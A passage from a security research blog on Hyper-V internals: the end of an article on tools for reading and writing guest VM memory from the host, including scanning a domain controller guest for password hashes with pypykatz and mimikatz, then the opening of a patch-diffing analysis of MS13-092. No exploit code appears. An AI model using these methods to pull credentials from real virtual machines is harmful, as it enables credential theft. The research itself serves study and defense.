<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For reading memory inside this block we have to enter vmwp.exe context:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 358px; overflow: hidden; width: 365px;"><img height="358" src="https://lh5.googleusercontent.com/5mdgtVmQ0UfYkv-0FAS3YOXordPtQB8Nr6p99GyRxHIgwIBVPn5vlM9tjeCc0voeEgZgGCcdAUEAr2uLcPPX6ScrzkO-Hu1ZMgnFc7y-PB4LRNmjzOaC32LyuLHH-eKbbD3Tlz0" style="margin-left: 0px; margin-top: 0px;" width="365" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 111px; overflow: hidden; width: 428px;"><img height="111" src="https://lh5.googleusercontent.com/Xq17kEQRf4Sx9g7l1JHx9kaYreXkXgDJyQyTMxv9LEDyEXkcOUBvxbVNPGgwB4Za8AH2t4S14_QgakiMi1RiHapLiy_So7id8gNTsJ8nVGvpAD_SVOgGexaQqfuBF-2zz-wu7eg" style="margin-left: 0px; margin-top: 0px;" width="428" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 140px; overflow: hidden; width: 540px;"><img height="140" src="https://lh4.googleusercontent.com/PboR8SMElzwsQj-NbUHh5jiddV7RNB_rIiKKVzPx2zLlNGFGQ-wmc5kIRqLtb9FM9RLBNwO9xUbFER3tAMAiOVKRs89u0BwzjtyGDor-clkM3U2G0tYiLDNoxxYSNKlrCX3yv8Y" style="margin-left: 0px; margin-top: 0px;" width="540" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vmwp.exe process of docker container contain descriptor of files, that used inside container:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 226px; overflow: hidden; width: 558px;"><img height="226" src="https://lh5.googleusercontent.com/Y2-jnx-OgSkEqraXo063Z66cEAHHtJ_4NHPQHiqQaBj9V6sbST5CXp1-ov0dXQihjuB3BBwcc0ImLf_Cb0an6kfudCr4rRCD85gHn8z1_7dHE5DBboavLCc0cdxeA_EC7ihchJM" style="margin-left: 0px; margin-top: 0px;" width="558" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">More information about docker containers internals you can see in video from Microsoft Ignite conference:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://www.youtube.com/watch?time_continue=2291&v=tG8R5SQGPck" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.youtube.com/watch?time_continue=2291&v=tG8R5SQGPck</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (OS internals: Technical deep-dive into operating system innovations - BRK3365, starting from 38:11).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Usage examples</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In which programs can we use the ability to read/write memory to the guest OS?</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd (as an alternative to Sysinternals LiveKd in the -hvl option part). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On screenshot, one Full VM with Windows Server 2019 and 1 Docker container in Hyper-V isolation mode are running on Hyper-V host server.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/gerhart01/LiveCloudKd/releases" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/releases</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 273px; overflow: hidden; width: 481px;"><img height="273" src="https://lh3.googleusercontent.com/-5EzZFN-rWOJj84D6R3lV6Nl3bm3MwCmwDjxlV_NOcGbgA3a7PEoWARMOA6u6cJ8TUSd3rOdabWsGzsliRDGwza9-Mv3pF2oyo53fVNER3B2-JNz1eeAqTFbvUwD6QXQbuvlX98" style="margin-left: 0px; margin-top: 0px;" width="481" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXDi-plugin for WinDBG - the options are the same, but allows you to use legal functions for WinDBG integration (LiveCloudKd uses hooks of some functions inside WinDBG). It even works with WinDBG Preview, which itself runs in a separate container (UWP application). At the time of writing, EXDi-plugin plugin only works with Windows Server 2019\Windows 10 with the hvmm.sys driver loaded, since it requires a write operation to the guest OS. The screenshot shows the operation of WinDBG Preview in EXDi mode and the mimilb.dll plugin, which is part of the mimikatz utility.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/gerhart01/LiveCloudKd/tree/master/ExdiKdSample" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/tree/master/ExdiKdSample</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 498px; overflow: hidden; width: 525px;"><img height="498" src="https://lh4.googleusercontent.com/26hsc4RHatB_BTdxkPIz2iMMjWWSwORtph52W7ZjUMfts3swE6bcHGXDAH5N-IjtZCIDZ9g9_rSJDGsmhxn4KAQ08CieaLsQNblaN9yXA8pblgbmaw1WDdF_iM0PYVZ7KHYYwK0" style="margin-left: 0px; margin-top: 0px;" width="525" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The plugin for the MemProcFs program (</span><a href="https://github.com/ufrisk/MemProcFS" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/ufrisk/MemProcFS</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), which is integrated with pypykatz (</span><a href="https://github.com/skelsec/pypykatz" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/skelsec/pypykatz</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) also allows you to scan the guest OS for hashes (in the screenshot, guest OS - domain controller, based on Windows Server 2016).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/gerhart01/LiveCloudKd/tree/master/LeechCore" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/tree/master/LeechCore</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 282px; overflow: hidden; width: 528px;"><img height="282" src="https://lh4.googleusercontent.com/wEctKwlRoHWjiDWstyuhedT1Sm3Nz-OHeAeDjnxXTg3GLVkBG3x8MvW31er7XtL4rFhi-WOLxRXVA7qlOXjv2UfFDXiVkaltLYWl1GToYzJY8-5W6xrZnmZzSGVLsd4qpopnWVI" style="margin-left: 0px; margin-top: 0px;" width="528" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is clear, that for using this method you need get access the host server with administrator rights. So, first of all, I position the utility as an opportunity to dig inside the OS when the debugger is long configured\too lazy or unable to connect (for example, the Secure Boot option is active).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The article described various ways to accessing memory of Hyper-V guest partitions, created in a variety of cases. I hope that working with Hyper-V memory has become a little more understandable. Hyper-V evolves very quickly and integrates more and more actively into the Windows kernel, while remaining virtually undocumented.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The information may be useful to those who want to understand the internal structure of Hyper-V, and possibly get transparent access to the guest OS memory, as well as make its modification. For LiveCloudKd usage it is necessary to have access to the root OS, where the virtual machines are located, and I don’t think that it carries any security risk. However, for Windows Server 2016 such access can be obtained using only the user mode API, which is rather problematic to control. For protection, it is recommended to enable either the Shielded VM option (then, to bypass it, you will need to load the driver), or use Windows Server 2019, where Microsoft blocked the API call from vid.dll for third-party processes and turned on for vmwp.exe the prohibition of injecting libraries, that not signed by Microsoft. However, the latest work on introducing code into third-party processes, demonstrated in August 2019 at Blackhat in Las Vegas (report by Process Injection Techniques - Gotta Catch Them All from Itzik Kotler and Amit Klein from SafeBreach Labs), shows that there are ways to get around these restrictions from user mode (of course, this requires local administrator rights). The only reliable protection against such access to guest OS is Microsoft's Code Integrity in conjunction with the Shielded VM.</span></div>
<br />
<br />
<br /></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-10972397743563496442017-10-27T13:15:00.001-07:002017-10-27T13:15:50.730-07:00Hyper-V debugging for beginners. Part 2, or half disclosure of MS13-092<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-8c16ddb9-5f74-3bd3-7840-8b5b26f2ace5" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Original article was written at the end of 2013 on Russian language (</span><a href="http://www.securitylab.ru/contest/448457.php" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://www.securitylab.ru/contest/448457.php</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), but since I didn’t see examples of </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1-day Hyper-V bug </span>researches and therefore decided translate it to English (with some fixes). Article was written before ERNW published information disclosure for MS13-092 (</span><a href="https://www.ernw.de/wp-content/uploads/ERNW_Newsletter_43_HyperV_en.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.ernw.de/wp-content/uploads/ERNW_Newsletter_43_HyperV_en.pdf</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this publication I try to describe how use information from article “Hyper-V debugging for beginners” (</span><a href="http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) for research 1-day Hyper-V vulnerability using diff techniques. Windows 8 x64 was used for guest OS.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 November 2013 Microsoft published bulletin MS13-092 (KB2893986), where they described vulnerability in Windows Server 2012 Hyper-V, which allowed generate BSOD in root OS from guest OS or execute arbitrary code in other guest OS on same physical host.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Load patch and see, what files was changed. It was hvix64.exe and hvax64.exe (version 6.2.9200.20840), debugging dll kdhvcom.dll and hvservice.sys (probably it contains code for hypervisor hibernation, but I could be wrong). We see hvix64.exe (I have intel CPU).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we havr to find patch, which was issued before KB2893986 – it was KB2885465. According </span><a href="http://support.microsoft.com/kb/2885465%20hvix64.exe" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://support.microsoft.com/kb/2885465 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvix64.exe</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> version is 6.2.9200.20811 from 30.08.2013, but there is version 6.2.9200.20814 from 04.09.2013 in archive.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we take bindiff plugin for IDA PRO and try compare these versions of hvix64.exe. The main problem of hvix64.exe debugging – we haven’t public symbols. We have much of unknown functions in IDA PRO, which was called with </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">sub_</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> prefixes. More than – many functions IDA PRO doesn’t recognize and we need recover it manually (using scripts, if it is possible). According first part of article (http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.htm) we load hvix64.exe in hypervisor, import known functions from hvloader.exe, kdhvcom.dll, winload.exe using bindiff (yes, parts of them are identical), create hypercall’s table using mVmcallHandlersTable.py (https://github.com/gerhart01/Hyper-V-scripts/blob/master/CreatemVmcallHandlersTable2016.py), configure debugger, attach to host server, recover interrupt handlers using script, find VM_EXIT handler. Also, we must find all instruction, which names begin from </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">loc_</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and manually make functions from them (P key in IDA PRO). In hvix64.exe many functions are ended with calls of exception generation (without return), and IDA PRO cannot recognize it automatically.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can read in vulnerability description (</span><a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-092" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://technet.microsoft.com/en-us/security/bulletin/ms13-092</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">): «…The vulnerability could allow elevation of privilege if an attacker passes a specially crafted function parameter in a hypercall from an existing running virtual machine to the hypervisor. The vulnerability could also allow denial of service for the Hyper-V host if the attacker passes a specially crafted </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">function parameter in a hypercall</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> from an existing running virtual machine to the hypervisor». Based on this information we must concentrate on hypercalls handlers. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next on </span><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3898" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3898</span></a><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">we can read more detailed information:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">“Microsoft Windows 8 and Windows Server 2012, when Hyper-V is used, does not ensure </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">memory-address validity</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, which allows guest OS users to execute arbitrary code in all guest OS instances, and allows guest OS users to cause a denial of service (host OS crash), via a guest-to-host hypercall with a crafted function parameter, aka "Address Corruption Vulnerability."</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We have addition information and we will try find all changes in hypercall handlers, which contain code working with memory.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are no symbols for hvix64.exe and therefore I give prefix </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">m </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for manually defined functions (for diff them from library functions, which was imported by bindiff early)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Ok, follow to execution, in mHOST_RIP (VM Exit handler) go to mParseVMExit,</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="273" src="https://lh6.googleusercontent.com/INnwYTinlfOgr7t2yhcKu9TzR2VD_7kl7JcBiEw4tIkbPinKjdghYFEgl1xmeOduZS396ZNvVjMomIA344vKODJH0AGFhXUC9Q2urz_q1kQbQ3KTCHx1XotrMCW_nRJ5K28PgrlaFO1kV112Lg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="248" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
